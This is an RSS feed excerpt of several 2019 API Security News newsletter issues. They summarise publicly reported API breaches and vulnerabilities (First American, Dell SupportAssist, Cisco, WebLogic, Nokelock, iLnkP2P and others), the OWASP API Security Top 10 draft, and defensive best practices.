<h2>Events: APISecurity Webcast from NordicAPIs</h2>
<p>Next Wednesday, June 19th 7:00 am PST, <a href="https://nordicapis.com/events/livecast-scaling-api-security-for-large-enterprises/" target="_blank" rel="noopener">NordicAPIs is hosting a livecast on API security</a> with Daniel Lindau, Isabelle Mauny, and Bill Doerrfeld.</p>
<blockquote><p><em>&#8220;Discover cutting-edge techniques deployed by modern organizations to both secure and scale their APIs. By automating the bug discovery process and standardizing how identity control, API developers are now prepared to better secure everything from microservices to Kubernetes clusters.</em></p></blockquote>
<blockquote><p><em>For this LiveCast, we’re devoting an hour to API security! Featuring community experts and their knowledge of new, advanced best practices for scaling API security.&#8221;</em></p></blockquote>
<p>The post <a href="https://apisecurity.io/issue-35-ide-support-openapi/">Issue 35: IDE support for OpenAPI</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 34: OWASP launches API Security Top 10 project</title>
		<link>https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 06 Jun 2019 00:00:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=6005</guid>

					<description><![CDATA[<p>This week, OWASP launched their Top 10 project for API Security. We also look at the changing landscape of OAuth 2.0 security, and the use of Postman and Burp for API penetration testing. OWASP API Top 10 The Open Web Application Security Project (OWASP) has long been popular for their Top 10 of web application [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/">Issue 34: OWASP launches API Security Top 10 project</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, OWASP launched their Top 10 project for API Security. We also look at the changing landscape of OAuth 2.0 security, and the use of Postman and Burp for API penetration testing.</p>
<h2>OWASP API Top 10</h2>
<p>The Open Web Application Security Project (OWASP) has long been popular for their Top 10 of web application security risks. Now they are extending their efforts to API Security.</p>
<p>Here&#8217;s what the <strong>Top 10 API Security Risks</strong> look like in the current draft:</p>
<ol>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api1-broken-object-level-authorization.htm">Broken Object Level Access Control</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api2-broken-authentication.htm">Broken Authentication</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api3-excessive-data-exposure.htm">Improper Data Filtering</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api4-lack-of-resources-and-rate-limiting.htm">Lack of Resources and Rate Limiting</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api5-broken-function-level-authorization.htm">Missing Function/Resource Level Access Control</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api6-mass-assignment.htm">Mass Assignment</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api7-security-misconfiguration.htm">Security Misconfiguration</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api8-injection.htm">Injection</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api9-improper-assets-management.htm">Improper Assets Management</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/api10-insufficient-logging-and-monitoring.htm">Insufficient Logging and Monitoring</a></li>
</ol>
<p>See also:</p>
<ul>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10.htm">OWASP API Top Encyclopedia</a></li>
<li><a href="https://apisecurity.io/encyclopedia/content/owasp/owasp-api-security-top-10-cheat-sheet.htm">OWASP API Security Top 10 Cheatsheet</a></li>
<li>The project&#8217;s <a href="https://www.owasp.org/images/e/ea/OWASP_APIs_Security_Project_Kick_Off.pdf" target="_blank" rel="noopener noreferrer">inaugural slide deck</a> from Erez Yalon and Inon Shkedy</li>
<li>Project&#8217;s <a href="https://github.com/OWASP/API-Security/tree/develop" target="_blank" rel="noopener noreferrer">github</a> repo for your contributions.</li>
</ul>
<p>The goal is to release version one of the document by the end of 2019.</p>
<h2>OAuth 2.0 Security Reinforced</h2>
<p><strong>OAuth 2.0</strong> and OpenID Connect have become one of the cornerstones of API Security. However, the technology and threat landscape has changed a lot since the adoption of RFC 6749 in 2012.</p>
<p>Torsten Lodderstedt has covered the key changes and new security best practices in his recent talk at EIC 2019. Please find his slide deck here: <a href="https://www.slideshare.net/TorstenLodderstedt/oauth-20-security-reinforced" target="_blank" rel="noopener noreferrer">&#8220;OAuth 2.0 Security Reinforced&#8221;</a>.</p>
<h2>Tools</h2>
<p>Mic Whitehorn-Gillam is doing a series of tutorials on API penetration testing with <strong>Postman &amp; Burp</strong>:</p>
<ul>
<li><a href="https://blog.secureideas.com/2019/03/better-api-penetration-testing-with-postman-part-1.html" target="_blank" rel="noopener noreferrer">Getting started with Postman</a></li>
<li><a href="https://blog.secureideas.com/2019/03/better-api-penetration-testing-with-postman-part-2.html" target="_blank" rel="noopener noreferrer">Proxying through Burp</a></li>
<li><a href="https://blog.secureideas.com/2019/04/better-api-penetration-testing-with-postman-part-3.html" target="_blank" rel="noopener noreferrer">Variables, parameters, tokens</a></li>
<li><a href="https://blog.secureideas.com/2019/06/better-api-penetration-testing-with-postman-part-4.html" target="_blank" rel="noopener noreferrer">JWT, authorization problems</a></li>
</ul>
<h2>Opinions</h2>
<p><strong>Alissa Knight from Aite Group</strong> has published <a href="https://medium.com/datadriveninvestor/something-wicked-this-way-comes-securing-your-apis-85c850a662f9" target="_blank" rel="noopener noreferrer">a write-up on API Security</a>:</p>
<ul>
<li>API adoption has grown fast. REST APIs have taken the world by storm.</li>
<li>This led to the rise of API breaches. Legacy technology such as Web Application Firewalls (WAF) do not help.</li>
<li>Poor API key management and poor handling of API contracts are some of the major factors that companies need to mitigate.</li>
</ul>
<p>The post <a href="https://apisecurity.io/issue-34-owasp-launches-api-security-top-10-project/">Issue 34: OWASP launches API Security Top 10 project</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 33: First American leaks 885 million mortgage records</title>
		<link>https://apisecurity.io/issue-33-first-american-leaks-885-mln-mortgage-records/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 30 May 2019 00:00:39 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5994</guid>

					<description><![CDATA[<p>Vulnerability: First American First American Financial Corp. was leaking 885 million mortgage deals records until it was notified by KrebsOnSecurity last week. The leaked records included highly sensitive information such as social security numbers (SSN), bank accounts, tax records, and wire details. Presumably, the company did not want to secure the documents to simplify the access [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-33-first-american-leaks-885-mln-mortgage-records/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-33-first-american-leaks-885-mln-mortgage-records/">Issue 33: First American leaks 885 million mortgage records</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<h2>Vulnerability: First American</h2>
<p><strong>First American Financial Corp.</strong> <a href="https://krebsonsecurity.com/2019/05/first-american-financial-corp-leaked-hundreds-of-millions-of-title-insurance-records/" target="_blank" rel="noopener">was leaking 885 million mortgage deals records</a> until it was notified by KrebsOnSecurity last week. The leaked records included highly sensitive information such as social security numbers (SSN), bank accounts, tax records, and wire details.</p>
<p>Presumably, the company did not want to secure the documents to simplify the access to them for all parties in a mortgage deal. As result, the records could be obtained just by putting a sequential document ID parameter in the URL. These parameters were 9-digit integers starting with <code>000000075</code> (this one dating from 2003). All attackers had to do was to keep incrementing this parameter and downloading the documents!</p>
<p>This shows how &#8220;simplifying&#8221; can backfire on you. Instead, access to specific partners with proper authentication and authorization should be used. If this cannot be done for business reasons, other security measures could still be implemented, such as:</p>
<ul>
<li>Separating the web page to view the document from the document URL, and password-protecting that page.</li>
<li>Avoiding sequenced identifiers and using randomized IDs instead.</li>
<li>Expiring the access to older documents.</li>
<li>Monitoring access to prevent bulk download attempts.</li>
<li>Notifying the business of the risks using proper risks/benefits analysis.</li>
</ul>
<h2>Vulnerability: Nokelock</h2>
<p>Researches have found API vulnerabilities in <strong>Nokelock Bluetooth-enabled padlocks</strong>. These are the most popular inexpensive devices of that kind on Amazon, and are sold under a few different brands.</p>
<p>The API for the locks uses unencrypted HTTP traffic and a shared API key across <em>all</em> accounts. This lets an attacker get an API key and re-use it against locks belonging to other customers. <a href="https://www.pentestpartners.com/security-blog/pwning-the-nokelock-api/" target="_blank" rel="noopener">An attacker could open the locks, get user information and device GPS location, or reassign lock ownership</a>.</p>
<p>Always use HTTPS as your transport protocol and personalized authentication and authorization to prevent such attacks.</p>
<h2>Analysts: KuppingerCole on API security</h2>
<p><strong>Alexei Balaganski from KuppingerCole</strong> has released a report on API security: &#8220;<a href="https://www.kuppingercole.com/report/wp80019" target="_blank" rel="noopener">The Dark Side of the API Economy</a>&#8220;. The report contains detailed examples of the recent exploits, common myths, and recommendations including:</p>
<ul>
<li>Education is key</li>
<li>Designing an API strategy</li>
<li>Know what you are protecting</li>
<li>API Zero Trust</li>
<li>Automating API security</li>
</ul>
<p>The report is free with a registration.</p>
<h2>Industry trends: The rise of REST and JSON</h2>
<p><strong>Akamai has </strong>released the <a href="https://www.akamai.com/us/en/multimedia/documents/state-of-the-internet/state-of-the-internet-security-retail-attacks-and-api-traffic-report-2019.pdf" target="_blank" rel="noopener">Security volume of their annual &#8220;State of the Internet&#8221; report</a>. It has fascinating statistics on the rapid rise of API traffic and the impact it has on security:</p>
<ul>
<li>API traffic now constitutes a whopping 83% of all web traffic! HTML traffic is down to just 17%.</li>
<li>This is a significant growth compared to the 47% only four years ago.</li>
<li>Most of the API traffic is JSON. XML is very much in decline.</li>
<li>Browsers (web applications) are only getting 27% of API traffic. The rest of the traffic is smartphones, applications, and devices.</li>
</ul>
<p>A quote from the report:</p>
<blockquote><p>&#8220;<em>For security practitioners, this is vitally important — not all tools are capable of handling the shift, and you may be missing a major source of malicious traffic in your defenses.</em>&#8220;</p></blockquote>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-33-first-american-leaks-885-mln-mortgage-records/">Issue 33: First American leaks 885 million mortgage records</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 32: WAFs missing API attacks for 86% of users</title>
		<link>https://apisecurity.io/issue-32-wafs-failing-api-security-86/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 23 May 2019 00:00:26 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5982</guid>

					<description><![CDATA[<p>This week, we take a look at the latest vulnerabilities in an ASUS update service and Linksys routers. In addition, there is a recent report on WAF customer satisfaction, and a new podcast on API security. Vulnerabilities: ASUS WebStorage We reported Dell&#8217;s Support Assist vulnerability few issues ago — and now the ASUS update service got a similar [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-32-wafs-failing-api-security-86/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-32-wafs-failing-api-security-86/">Issue 32: WAFs missing API attacks for 86% of users</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we take a look at the latest vulnerabilities in an ASUS update service and Linksys routers. In addition, there is a recent report on WAF customer satisfaction, and a new podcast on API security.</p>
<h2>Vulnerabilities: ASUS WebStorage</h2>
<p>We reported Dell&#8217;s Support Assist vulnerability <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/" target="_blank" rel="noopener">few issues ago</a> — and now the <a href="https://www.welivesecurity.com/2019/05/14/plead-malware-mitm-asus-webstorage/" target="_blank" rel="noopener">ASUS update service got a similar one</a>. The scenario is similar: <strong>ASUS WebStorage Update</strong> did not enforce HTTPS and signatures for downloaded files. These deficiencies allowed attackers to launch a man-in-the-middle (MitM) attack, intercept the traffic, and trick the update agent into installing rogue files.</p>
<p>Always use HTTPS, and never trust any unsigned data.</p>
<h2>Vulnerabilities: Linksys routers</h2>
<p>Over 25,000 <strong>Linksys Smart Wi-Fi routers</strong> <a href="https://badpackets.net/over-25000-linksys-smart-wi-fi-routers-vulnerable-to-sensitive-information-disclosure-flaw/ " target="_blank" rel="noopener">have an unprotected API that leaks data about the devices connected to the routers</a>, such as:</p>
<ul>
<li>Name</li>
<li>MAC address</li>
<li>OS</li>
<li>Firewall status</li>
<li>WAN settings</li>
<li>Firmware updates</li>
<li>DDNS</li>
</ul>
<p>Attackers can thus get that data, learn more about the devices in the user network, and use that information for other attacks, without any authentication.</p>
<p>The API also tells if the admin password is default or changed. Attacker can thus know which routers can be managed with default administrative credentials.</p>
<p>The bottom line is that security by obscurity does not work: if you have an unprotected API, the chances are that someone <em>will</em> find it. And default admin passwords are evil, too.</p>
<h2>WAFs are failing to adapt</h2>
<p><strong>Only 40% of organizations are satisfied with their web application firewalls</strong> (WAF), <a href="https://www.helpnetsecurity.com/2019/05/15/dissatisfied-waf/" target="_blank" rel="noopener">according to the Ponemon Institute report published by Cequence Security:</a></p>
<p>&#8220;The State of Web Application Firewalls report is based on data gathered from 595 organizations across the U.S. On average, they have each deployed 158 web, mobile, and API-based applications, on premises and in the cloud.&#8221;</p>
<p>The rapid shift of web traffic to API traffic for mobile, web, IoT, and microservices has made it hard for WAFs to stay relevant:</p>
<ul>
<li>86% of WAF customers had in the last 12 months attacks that bypassed their WAF.</li>
<li>On average, customers need 2.5 full-time people maintaining the WAFs.</li>
<li>Average total cost of ownership is $620K/yr (of which $420K/yr is going to the WAF vendors).</li>
</ul>
<h2>API security podcast</h2>
<p>Alissa Knight at <strong>Aite Group Radio</strong> podcast has released <a href="https://aitegroup.libsyn.com/episode-6-interview-with-42-crunchs-dmitry-sotnikov-on-api-security-and-api-breaches" target="_blank" rel="noopener">episode 6 specifically on API security</a>. On the podcast, Alissa and I discuss the recent API breaches, their root causes, and what could be done to mitigate them:</p>
<p><a href="https://aitegroup.libsyn.com/episode-6-interview-with-42-crunchs-dmitry-sotnikov-on-api-security-and-api-breaches" target="_blank" rel="noopener"><img loading="lazy" decoding="async" class="aligncenter size-full wp-image-5983" src="https://apisecurity.io/wp-content/uploads/2019/05/Aite-podcast.jpg" alt="" width="1502" height="189" /></a></p>
<p>The post <a href="https://apisecurity.io/issue-32-wafs-failing-api-security-86/">Issue 32: WAFs missing API attacks for 86% of users</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 31: Samsung SmartThings repo token leaks, and Facebook fined for API vulnerability</title>
		<link>https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 16 May 2019 00:00:10 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5944</guid>

					<description><![CDATA[<p>This week, Samsung has leaked a token that provides full access to their SmartThings code repository, and Facebook fixed one API flaw but got fined for another. We also have a discussion of API security and DevOps, and look into a survey that Postman runs on the future of OpenAPI support. API keys We have [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/">Issue 31: Samsung SmartThings repo token leaks, and Facebook fined for API vulnerability</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, Samsung has leaked a token that provides full access to their SmartThings code repository, and Facebook fixed one API flaw but got fined for another. We also have a discussion of API security and DevOps, and look into a survey that Postman runs on the future of OpenAPI support.</p>
<h2>API keys</h2>
<p>We have discussed API key security in our <a href="https://apisecurity.io/issue-25-nist-microservices-guidelines-facebook-opens-pentesting/" target="_blank" rel="noopener">issue 25</a>. This week, there was another high profile leak: <a href="https://techcrunch.com/2019/05/08/samsung-source-code-leak/" target="_blank" rel="noopener">Researchers found in the wild a token giving full access to the <strong>Samsung SmartThings</strong> GitLab repository.</a></p>
<p>One of the Samsung labs had a GitLab server with some of the repositories set to be public, and one of these repos had an AWS S3 access token in its code. The AWS S3 turned out to have more than 100 storage buckets, containing logs and analytics. Within that data researches found GitLab tokens, including the one for the SmartThings project.</p>
<p>The SmartThings app has more than 100 million installations globally. Thus, the potential impact of any attacker modifying the code is huge.</p>
<p>Keep your repositories private and <em>never</em> put your API tokens in your code or logs!</p>
<h2>Business impact</h2>
<p><strong>Facebook </strong><a href="https://www.zdnet.com/article/turkey-fines-facebook-for-december-2018-api-bug/" target="_blank" rel="noopener">got fined for the API vulnerability</a> in their Photo API that leaked private photos. The vulnerability was found and fixed <a href="https://apisecurity.io/issue-11-mutual-tls-auth-golang-open-dos-xss-in-google-code-in/" target="_blank" rel="noopener">back in December</a> but this shows that even vulnerabilities that are fixed might come back to bite you.</p>
<h2>API security by design</h2>
<p>Some more bad news from <strong>Facebook</strong>: <a href="https://www.7elements.co.uk/resources/blog/facebooks-burglary-shopping-list/" target="_blank" rel="noopener">they had another API issue last week</a>. This one was a flaw in the API design.</p>
<p>Facebook has a marketplace section that lets users buys and sell stuff. The web application fuzzes the seller&#8217;s location to protect privacy. However, the fuzzing was implemented only on the web UI&#8217;s side. The API itself gave away the exact GPS coordinates, so that an attacker could get the exact location of any seller on the platform.</p>
<p>Bottomline here is that APIs should be treated as products. They should not disclose more information than the product is supposed to disclose.</p>
<h2>Reviews</h2>
<p><strong>Enterprise Security Weekly</strong> is a popular online show by Matt Alderman and Paul Asadorian. This week, among many other topics, <a href="https://youtu.be/eJFIZc87Ux0?t=143">they had a discussion on API security</a>. API attacks are on the rise, so how do you ensure that your APIs are comprehensively audited and protected from dev to QA to runtime?</p>
<p><iframe loading="lazy" title="Security Industry Briefings Update - Enterprise Security Weekly #136" width="640" height="360" src="https://www.youtube.com/embed/eJFIZc87Ux0?start=143&#038;feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen></iframe></p>
<p>They also reviewed <a href="https://42crunch.com/" target="_blank" rel="noopener">42Crunch</a> tools for API security. (Disclosure: <a href="https://apisecurity.io/" target="_blank" rel="noopener">APIsecurity.io</a> is owned by 42Crunch, and I am a 42Crunch employee.)</p>
<h2>Tools</h2>
<p>CEO and the founder of <strong>Postman</strong>, Abhinav Asthana, is asking for help in determining what the scope of the OpenAPI support should be in the tool. He runs a survey on whether developers typically write the API definition in an editor, or generate it from the code. <a href="https://twitter.com/a85/status/1128363797301698565" target="_blank" rel="noopener">Cast your vote here</a>.</p>
<p>&nbsp;</p>
<p>The post <a href="https://apisecurity.io/issue-31-samsung-smartthings-repo-token-leaks-facebook-fined-api-vulnerability/">Issue 31: Samsung SmartThings repo token leaks, and Facebook fined for API vulnerability</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 30: 5G going to REST. Breaches in Dell, Cisco, WebLogic, DockerHub, JustDial, iLnkP2P</title>
		<link>https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 09 May 2019 00:00:54 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5922</guid>

					<description><![CDATA[<p>This week, there were a lot of API vulnerabilities including: Dell Cisco (a whopping three of them!) Oracle WebLogic DockerHub JustDial Millions of IoT devices based on iLnkP2P We also look into what implications 5G transitioning to REST and HTTPS brings to API security. Vulnerabilities and breaches Dell Probably the highest profile issue of the [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/">Issue 30: 5G going to REST. Breaches in Dell, Cisco, WebLogic, DockerHub, JustDial, iLnkP2P</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, there were <em>a lot</em> of API vulnerabilities including:</p>
<ul>
<li>Dell</li>
<li>Cisco (a whopping three of them!)</li>
<li>Oracle WebLogic</li>
<li>DockerHub</li>
<li>JustDial</li>
<li>Millions of IoT devices based on iLnkP2P</li>
</ul>
<p>We also look into what implications 5G transitioning to REST and HTTPS brings to API security.</p>
<h2>Vulnerabilities and breaches</h2>
<h3>Dell</h3>
<p>Probably the highest profile issue of the week was the <a href="https://d4stiny.github.io/Remote-Code-Execution-on-most-Dell-computers/" target="_blank" rel="noopener">vulnerabilities in SupportAssist client</a>, <strong>an automated update utility that Dell ships with every computer</strong>. This utility is a web server running on your machine, with an API designed to let Dell push and install updates on your computer.</p>
<p>The solution had multiple design flaws. For example, it didn&#8217;t even require the binaries to be signed. Yet in the end, the weakest link turned out to be the transport enforcement code.</p>
<p>The code was checking paths that the API received using a <code>StartsWith("http://")</code> check. If the returned response was <code>true</code>, the code replaced HTTP with HTTPS to download the binary over a secure connection. The utility also had a limited set of Dell-controlled domains from where it was fine to download the updates.</p>
<p>To take advantage of this, attackers could simply begin the path URL with <code>" http://"</code>, with an extra space in the beginning. The <code>StartsWith("http://")</code> check then returned <code>false</code>, and a HTTP connection was established. The attackers were then free to launch a successful man-in-the-middle attack and execute their own code.</p>
<p>A reminder that proper input sanitization, format enforcement, payload control, signatures, and encryption must be integral parts of any API.</p>
<h3>Cisco</h3>
<p><strong>Cisco had three API vulnerabilities that it had to patch</strong> this week:</p>
<ul>
<li>TelePresence Video Communication Server</li>
<li>ASA 5500-X Series Firewalls</li>
<li>Elastic Services Controller</li>
</ul>
<p>In all three, the vulnerabilities were related to malformed payloads causing the APIs to misbehave.</p>
<p>With <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190417-es-tvcs-dos" target="_blank" rel="noopener">TelePresence</a>, an unexpected, specifically crafted XML input caused the API to consume 100% of CPU, making the device unusable.</p>
<p>However, the vulnerability in <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20190507-esc-authbypass" target="_blank" rel="noopener">Elastic Services Controller</a> (ESC) was the worst of the three, with a Common Vulnerability Scoring System (CVSS) rating of 10/10.</p>
<p>This vulnerability of ESC REST API allowed any remote, unauthenticated attacker to send unexpected, specifically crafted requests that the backend couldn&#8217;t properly process. The attackers could then execute arbitrary actions on the system.</p>
<p>To avoid such breaches, you must lock down the payload definitions of your API and enforce these contracts strictly.</p>
<h3>Oracle WebLogic</h3>
<p>The <strong>Oracle WebLogic web server API breach</strong> is just as bad as the Cisco one. Here, too, the vulnerability allowed remote code execution using malformed payloads.</p>
<p>And this has already happened: <a href="https://unit42.paloaltonetworks.com/attackers-increasingly-targeting-oracle-weblogic-server-vulnerability-for-xmrig-and-ransomware/" target="_blank" rel="noopener">ransomware and cryptomining attacks are busily exploiting this vulnerability</a>. WebLogic servers are quite widespread in enterprise, and they mostly run critical systems. This makes the attacks very lucrative.</p>
<p>About 41,000 WebLogic servers are publicly accessible from the internet. If you have one of them, make sure to patch as soon as possible. Again, API providers can prevent attacks like this one by clearly defining the API input and enforcing that definition.</p>
<h3>iLnkP2P</h3>
<p>This <strong>API vulnerability in iLnkP2P library</strong> <a href="https://threatpost.com/iot-devices-vulnerable-takeover/144167/">affected about 2 million IoT devices</a> that use the P2P library for discovery. The devices, such as security cameras and baby monitors, used the API to make it easy to start using them. Consumers could use a mobile app to scan a code on the device or type in the device ID to start managing the device.</p>
<p>The system authenticated devices using the device ID and a preset, hard-coded password. To make things worse, the device IDs and the backend API implementation allowed attackers to brute-force enumerate the IDs. The attackers could then find the devices that were online and take over them. Consumers had no chance to change the password or the device ID to protect themselves.</p>
<p>Lessons to learn: hard-coded passwords and IDs that can be enumerated are evil and must be avoided!</p>
<h3>JustDial</h3>
<p>We have <a href="https://apisecurity.io/issue-28-breaches-tchap-shopify-justdial/" target="_blank" rel="noopener">previously</a> covered an API vulnerability in <strong>JustDial, India&#8217;s leading local search engine</strong>.<span data-offset-key="1pe4m-5-0"> </span></p>
<p>This week, the same researcher found <a href="https://www.analyticsindiamag.com/justdial-experiences-second-data-breach-in-two-weeks-demonstrates-opsec-failings/" target="_blank" rel="noopener">another unprotected public API in JustDial</a> that was leaking data. Now their reviews API leaked the reviewer’s name, mobile number, and location.</p>
<p>The bottom line here: just because your application doesn&#8217;t <em>show</em> some of the data that your API exposes, it doesn&#8217;t mean that attackers cannot access the API (and thus the data!) directly.</p>
<h3>DockerHub</h3>
<p><a href="https://success.docker.com/article/docker-hub-user-notification" target="_blank" rel="noopener">The recent <strong>DockerHub breach</strong></a> was not in itself related to an API, but to unauthorized database access. However, its outcomes do include an API angle.</p>
<p>DockerHub integrates with code repository systems (like GitHub and Bitbucket) using <a href="https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/">OAuth2</a>. Because of this, once DockerHub was compromised, the tokens of the code repository systems leaked too. Attackers could then use the leaked tokens to access these systems.</p>
<p>Once DockerHub found out about the breach, they have been very proactive in invalidating the leaked tokens.</p>
<h2>Technology trends</h2>
<p><strong>5G mobile networks are coming</strong>. If you have not been paying close attention to them, the new technology stack behind might surprise you.</p>
<p>5G mobile networks are actually abandoning the traditional cellular networking stack. Instead, they are switching to micro-services and REST. This also brings <a href="https://www.a10networks.com/blog/how-the-5g-telco-market-is-transforming-with-lessons-learned-from-the-enterprise" target="_blank" rel="noopener">changes in the security tools that telcos need for API security</a>.</p>
<p>The post <a href="https://apisecurity.io/issue-30-5g-going-to-rest-breaches-in-dell-cisco-weblogic-dockerhub-justdial-ilnkp2p/">Issue 30: 5G going to REST. Breaches in Dell, Cisco, WebLogic, DockerHub, JustDial, iLnkP2P</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Issue 29: OAuth2 attacks, car GPS vulnerabilities, and honeypot stats</title>
		<link>https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/</link>
		
		<dc:creator><![CDATA[Mark Dolan]]></dc:creator>
		<pubDate>Thu, 02 May 2019 00:00:23 +0000</pubDate>
				<category><![CDATA[Newsletter Archive]]></category>
		<guid isPermaLink="false">https://apisecurity.io/?p=5914</guid>

					<description><![CDATA[<p>This week, we look into the latest API vulnerabilities in cars, Nagios, and Portainer, as well as different OAuth 2.0 attack scenarios, and the time it takes for attackers to find new API endpoints. Vulnerabilities and breaches Some car owners install hardware GPS tracking devices in their vehicles. These are accessed and managed through mobile [...]</p>
<p><a class="btn btn-secondary understrap-read-more-link" href="https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/">Read More...</a></p>
<p>The post <a href="https://apisecurity.io/issue-29-oauth2-attacks-car-gps-vulnerabilities-honeypot-stats/">Issue 29: OAuth2 attacks, car GPS vulnerabilities, and honeypot stats</a> appeared first on <a href="https://apisecurity.io/">API Security News</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>This week, we look into the latest API vulnerabilities in cars, Nagios, and Portainer, as well as different OAuth 2.0 attack scenarios, and the time it takes for attackers to find new API endpoints.</p>
<h2>Vulnerabilities and breaches</h2>
<p>Some car owners install hardware <strong>GPS tracking devices in their vehicles</strong>. These are accessed and managed through mobile apps. Two such apps called <a href="https://motherboard.vice.com/en_us/article/zmpx4x/hacker-monitor-cars-kill-engine-gps-tracking-apps" target="_blank" rel="noopener"><strong>iTrack </strong>and <strong>ProTrack</strong> got hacked, with about 7,000 and 20,000 users affected respectively</a>. Both of these apps had cloud APIs behind them, the default password set to <code>123456</code>, <em>and</em> the API allowing brute force ID enumeration. Attackers could get information on both the car and its owner, such as location, owner name, phone number, address, model, make, IMEI number&#8230; With some tracker models, the attackers could have even send commands to the vehicle, for example, to kill the engine.</p>
<p>A popular system and network monitoring solution, <strong>Nagios XI</strong>, <a href="https://tools.cisco.com/security/center/viewAlert.x?alertId=59901" target="_blank" rel="noopener">had a SQL injection vulnerability in its APIs</a>. The API did not sufficiently validate input that users supplied, and attackers could exploit this by making an API call using fusekeys and a malicious user ID. A successful SQL injection can serve as the starting point for further attacks. If you are using Nagios:</p>
<ul>
<li>Upgrade to Nagios XI 5.5.11 or later</li>
<li>Limit API access to trusted users, trusted networks, and trusted hosts</li>
</ul>
<p>A popular Docker management tool,  <strong>Portainer</strong>, <a href="https://tools.cisco.com/security/center/viewAlert.x?alertId=59882" target="_blank" rel="noopener">had an unauthenticated <code>/api/settings</code> API</a>. The system was storing LDAP credentials in cleartext and leaking them out through this endpoint. An unauthenticated, remote attacker could have used the API to get the password to the LDAP directory and obtain sensitive information.</p>
<h2>Technology 101:  OAuth 2.0</h2>
